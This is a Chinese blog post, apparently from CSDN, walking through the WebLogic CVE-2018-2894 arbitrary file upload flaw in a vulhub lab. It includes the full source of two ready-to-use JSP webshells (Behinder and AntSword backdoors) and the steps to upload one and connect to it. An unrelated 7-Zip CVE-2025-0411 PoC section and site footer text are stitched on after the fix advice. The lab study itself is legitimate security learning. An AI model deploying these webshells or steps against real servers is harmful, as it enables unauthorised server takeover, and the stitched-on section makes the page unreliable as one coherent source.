Weblogic 任意文件上传漏洞复现(CVE-2018-2894)

一、漏洞描述

Oracle融合中间件(子组件:WLS - Web服务)的Oracle WebLogic Server组件中的漏洞。受影响的受支持版本为12.1.3.0,12.2.1.2和12.2.1.3。易于利用的漏洞允许通过HTTP进行网络访问的未经身份验证的攻击者破坏Oracle WebLogic Server。成功攻击此漏洞可能导致Oracle WebLogic Server被占用。在开启了Web Service Test Page功能的情况下,攻击者可以无需授权上传恶意文件,从而控制服务器。

二、受影响的版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

三、环境搭建与漏洞复现

进入vulhub使用docker搭建环境

cd /vulhub/weblogic/CVE-2018-2894

docker-compose up -d

可以使用命令:docker ps来查看端口号

环境启动后,访问http://your-ip:7001/console,即可看到后台登录页面

执行docker-compose logs | grep password可查看管理员密码,管理员用户名为:weblogic,密码为:8XzCCxpF

登录后台页面,点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项,记得保存。

访问http://192.168.190.134:7001/ws_utc/config.do,设置Work Home Dir/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css。将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要。

网上找的jsp木马文件

这个是用冰蝎连的

//默认连接密码rebeyond
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

 这个是用蚁剑连的
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd"); //密码为:passwd,可自行更改
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

生成shell.jsp文件

上传shell.jsp文件:

利用burp suite抓包,然后找到这个上传文件的时间戳,如果有好多个,那么就取最后一个时间戳

然后这个jsp木马上传的位置目录如下,访问这个url:

http://192.168.190.134:7001/ws_utc/css/config/keystore/1720336026039_shell.jsp

直接拿冰蝎连

连接成功:

用蚁剑连接:

四、解决建议

关闭Web Service Test Page功能, 升级Weblogic。

### 复现 CVE-2025-0411 7-zip 漏洞 为了成功复现CVE-2025-0411漏洞,需遵循一系列精确的操作流程。此漏洞存在于7-zip软件中,利用了处理特定构造文件时存在的缺陷。 #### 准备工作环境 确保拥有一个安全隔离的测试环境至关重要,建议在一个专门用于实验的安全沙箱内操作。这可以防止潜在风险扩散到生产环境中[^2]。 #### 获取必要的工具和资源 访问GitHub仓库`https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git`下载针对该漏洞的概念验证(PoC)代码。通过克隆上述链接中的项目获取所需材料。 ```bash git clone https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git cd 7-Zip-CVE-2025-0411-POC/ ``` #### 安装受影响版本的应用程序 安装易受攻击的具体版本7-zip应用程序,在执行任何进一步步骤之前确认已正确设置目标应用及其依赖项。 #### 执行PoC脚本 按照README文档指示运行所提供的Python脚本来触发漏洞行为并观察其效果。通常情况下会有一个简单的命令行指令来启动测试过程: ```bash python exploit.py ``` 请注意,实际输出可能因具体实施细节而异;务必参照官方说明进行调整以适应不同场景下的需求。 #### 验证结果 一旦完成以上各阶段的工作,则应该能够看到预期的结果——即证明存在描述的安全隐患。然而重要的是要记住仅限于合法授权范围内开展此类活动,并始终采取适当措施保护个人隐私与数据安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值